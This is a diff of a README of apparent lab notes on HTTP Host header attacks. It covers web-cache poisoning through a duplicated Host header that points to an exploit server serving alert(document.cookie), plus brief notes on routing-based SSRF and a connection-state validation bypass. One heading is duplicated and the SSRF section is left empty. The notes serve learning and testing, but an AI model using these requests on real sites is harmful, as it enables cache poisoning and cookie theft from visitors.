CyberHansel/HTTP-Host-header-attacks/README.md

 > EX-Cache: hit

 4.)
 Create malicious domain where store your exploit.
-Back in Burp Repeater, add a second Host header containing your exploit server domain name.
-The request should look something like this:
+Back in Burp Repeater, add a second Host header containing your exploit server domain name

 > GET /?cb=123 HTTP/1.1  # "?cb=123" is random, used as unique cache key that we know
 > Host: realwebsite.net
 > Host: YOUR-EXPLOIT-SERVER-ID.exploit-server.net

-/resources/js/tracking.js
-alert(document.cookie)
+Exploit file: /resources/js/tracking.js and body alert(document.cookie)

+### Routing-based SSRF - Host header SSRF attacks

+Cloud-based architectures, load balancers and reverse proxies receive requests and forward them to the appropriate back-end.
+If they are insecurely configured to forward requests based on an unvalidated Host header, they can be manipulated into misrouting requests.

+### Routing-based SSRF - Host header SSRF attacks

+### Host validation bypass via connection state attack
+Poorly implemented HTTP server settings state that Host: header, are identical for all HTTP/1.1 requests.
+Or servers that only perform thorough validation on the first request they receive over a new connection.
+In this case, you can potentially bypass this validation by sending an innocent-looking initial request then following up with your malicious one down the same connection.